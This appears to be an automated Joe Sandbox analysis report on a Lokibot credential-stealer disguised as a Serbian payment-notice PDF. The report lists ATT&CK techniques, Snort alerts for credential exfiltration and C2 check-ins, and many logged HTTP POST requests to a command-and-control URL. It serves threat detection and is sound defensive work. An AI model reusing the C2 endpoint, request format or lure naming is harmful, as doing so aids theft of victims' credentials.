
Analysis Report Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 195637
Start date: 12.12.2019
Start time: 09:38:43
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 51s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.spyw.evad.winEXE@3/2@0/1
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 99.5% (good quality ratio 97.1%)
  • Quality average: 83.7%
  • Quality standard deviation: 24.8%
HCA Information:
  • Successful, ratio: 84%
  • Number of executed functions: 67
  • Number of non-executed functions: 154
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, CompatTelRunner.exe
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy: Threshold
Score: 100
Range: 0 - 100
Whitelisted: false
Threat: Lokibot
Detection: malicious

Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification

Analysis Advice

Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook
Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



MITRE ATT&CK Matrix

Techniques are listed per tactic column; the number in parentheses is the signature count shown against that technique in the report's matrix.

Initial Access: Valid Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Spearphishing Link; Spearphishing Attachment; Spearphishing via Service; Supply Chain Compromise
Execution: Execution through API (1); Command-Line Interface (2); Windows Management Instrumentation; Scheduled Task; Command-Line Interface; Graphical User Interface; Scripting; Third-party Software; Rundll32
Persistence: Application Shimming (1); Port Monitors; Accessibility Features; System Firmware; Shortcut Modification; Modify Existing Service; Path Interception; Logon Scripts; DLL Search Order Hijacking
Privilege Escalation: Access Token Manipulation (1); Process Injection (12); Application Shimming (1); DLL Search Order Hijacking; File System Permissions Weakness; New Service; Scheduled Task; Process Injection; Service Registry Permissions Weakness
Defense Evasion: Software Packing (2); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Masquerading (1); Virtualization/Sandbox Evasion (13); Access Token Manipulation (1); Process Injection (12); Indicator Blocking; Process Injection
Credential Access: Credential Dumping (2); Input Capture (21); Credentials in Registry (2); Credentials in Files; Account Manipulation; Brute Force; Two-Factor Authentication Interception; Bash History; Input Prompt
Discovery: System Time Discovery (1); Account Discovery (1); Security Software Discovery (241); File and Directory Discovery (2); System Information Discovery (27); Virtualization/Sandbox Evasion (13); Process Discovery (2); Application Window Discovery (11); System Owner/User Discovery (1)
Lateral Movement: Remote File Copy (3); Remote Services; Windows Remote Management; Logon Scripts; Shared Webroot; Third-party Software; Pass the Hash; Remote Desktop Protocol; Windows Admin Shares
Collection: Man in the Browser (1); Data from Local System (2); Email Collection (1); Input Capture (21); Clipboard Data (1); Screen Capture; Email Collection; Clipboard Data; Automated Collection
Exfiltration: Data Encrypted (1); Exfiltration Over Other Network Medium; Automated Exfiltration; Data Encrypted; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over Command and Control Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Physical Medium
Command and Control: Remote File Copy (3); Standard Cryptographic Protocol (1); Standard Non-Application Layer Protocol (2); Standard Application Layer Protocol (12); Standard Cryptographic Protocol; Commonly Used Port; Uncommonly Used Port; Standard Application Layer Protocol; Multilayer Encryption
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Premium SMS Toll Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction

Signature Overview



AV Detection:

Antivirus detection for URL or domain
Source: http://107.175.150.73/~giftioz/.vokol/fre.php; Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://107.175.150.73/~giftioz/.vokol/fre.php; Virustotal: Detection: 16%
Multi AV Scanner detection for submitted file
Source: Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe; Virustotal: Detection: 39%

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe; Code function: 0_2_00408788 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,0_2_00408788
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe; Code function: 0_2_00476F2C FindFirstFileA,GetLastError,FindClose,0_2_00476F2C
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe; Code function: 0_2_004052B8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_004052B8
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe; Code function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_2_00403D74
Source: C:\Users\user\Desktop\Obavestenje o prilivu za 005#U00b70800#U00b70200#U00b73205#U00b7pdf.exe; Code function: 2_1_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_1_00403D74

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49720 -> 107.175.150.73:80
Source: Traffic; Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49720 -> 107.175.150.73:80
Source: Traffic; Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49720 -> 107.175.150.73:80
Source: Traffic; Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49720 -> 107.175.150.73:80
Source: Traffic; Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49721 -> 107.175.150.73:80
Source: Traffic; Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49721 -> 107.175.150.73:80
Source: Traffic; Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49721 -> 107.175.150.73:80
Source: Traffic; Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49721 -> 107.175.150.73:80
Source: Traffic; Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49722 -> 107.175.150.73:80
Source: Traffic; Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49722 -> 107.175.150.73:80
Source: Traffic; Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49722 -> 107.175.150.73:80
Source: Traffic; Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49722 -> 107.175.150.73:80
The same four alerts (2024313, 2021641, 2025381, 2024318) recur for every subsequent connection from 192.168.2.5, source ports 49723 through 49776, to 107.175.150.73:80.
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49776 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49776 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49777 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49777 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49777 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49777 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49778 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49778 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49778 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49778 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49779 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49779 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49779 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49779 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49780 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49780 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49780 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49780 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49781 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49781 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49781 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49781 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49782 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49782 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49782 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49782 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49783 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49783 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49783 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49783 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49784 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49784 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49784 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49784 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49785 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49785 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49785 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49785 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49786 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49786 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49786 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49786 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49787 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49787 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49787 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49787 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49788 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49788 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49788 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49788 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49789 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49789 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49789 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49789 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49790 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49790 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49790 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49790 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49791 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49791 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49791 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49791 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49792 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49792 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49792 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49792 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49793 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49793 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49793 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49793 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49794 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49794 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49794 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49794 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49795 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49795 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49795 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49795 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49796 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49796 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49796 -> 107.175.150.73:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49796 -> 107.175.150.73:80
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: unknown unknown
Uses a known web browser user agent for HTTP communication
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 176 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 176 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
Source: global traffic | HTTP traffic detected: POST /~giftioz/.vokol/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 107.175.150.73 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: EBCE8AE2 | Content-Length: 149 | Connection: close
